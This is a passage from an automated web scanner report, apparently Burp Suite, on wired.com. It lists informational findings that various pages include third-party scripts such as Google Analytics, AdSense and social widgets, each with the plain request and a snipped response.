...[SNIP]...

16.46. http://www.wired.com/about/press/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/press/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/press/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.47. http://www.wired.com/about/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/privacy-policy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.48. http://www.wired.com/about/rss_feeds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/rss_feeds/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/rss_feeds/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:23:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:22 GMT
Date: Wed, 12 Jan 2011 15:40:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.49. http://www.wired.com/about/sitemap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/sitemap/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/sitemap/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.50. http://www.wired.com/about/staff_web/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/staff_web/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/staff_web/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:47 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:35 GMT
Date: Wed, 12 Jan 2011 15:40:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.51. http://www.wired.com/about/user-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/user-agreement/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/user-agreement/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.52. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.53. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.54. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.55. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.56. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.57. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.58. http://www.wired.com/autopia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /autopia/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.59. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/autopia/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:16:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=474
Expires: Wed, 12 Jan 2011 15:46:36 GMT
Date: Wed, 12 Jan 2011 15:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.60. http://www.wired.com/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/blogs/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /blogs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:42:28 GMT
Date: Wed, 12 Jan 2011 15:38:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang
...[SNIP]...


       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...

16.61. http://www.wired.com/cars/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/cars/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /cars/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:13 GMT
Date: Wed, 12 Jan 2011 15:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.62. http://www.wired.com/culture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/culture/

